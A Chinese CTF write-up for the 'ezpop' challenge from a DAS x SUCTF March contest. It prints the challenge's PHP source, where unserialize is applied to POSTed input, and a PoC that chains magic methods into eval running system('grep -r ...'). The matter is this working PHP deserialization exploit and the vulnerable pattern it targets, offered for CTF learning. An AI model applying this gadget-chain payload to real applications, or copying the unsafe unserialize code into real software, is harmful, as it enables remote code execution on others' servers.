0
点赞
收藏
分享

微信扫一扫

DAS x SUCTF三月月赛WP+复现

_LEON_ 2022-03-30 阅读 92
php

ezpop

直接得到源码:

<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}

pop链:

poc:

<?php

class crow
{
    public $v1;
    public $v2;
    public function __construct($v1,$v2)
    {
        $this->v1 = $v1;
        $this->v2 = $v2;
    }
}

class fin
{
    public $f1;
    public function __construct($f1)
    {
        $this->f1 = $f1;
    }
}

class what
{
    public $a;
    public function __construct($a)
    {
        $this->a = $a;
    }
}
class mix
{
    public function __construct($m1)
    {
        $this->m1 = $m1;
    }
}

$a = new fin(new what(new mix(new crow(new fin(new mix(';
system(\'grep -r "{"\');')),''))));
echo urlencode(serialize($a));

小记:
因为太菜了所以比赛的时候只做出了pop,其他题目等复现了再放上来

举报

相关推荐

0 条评论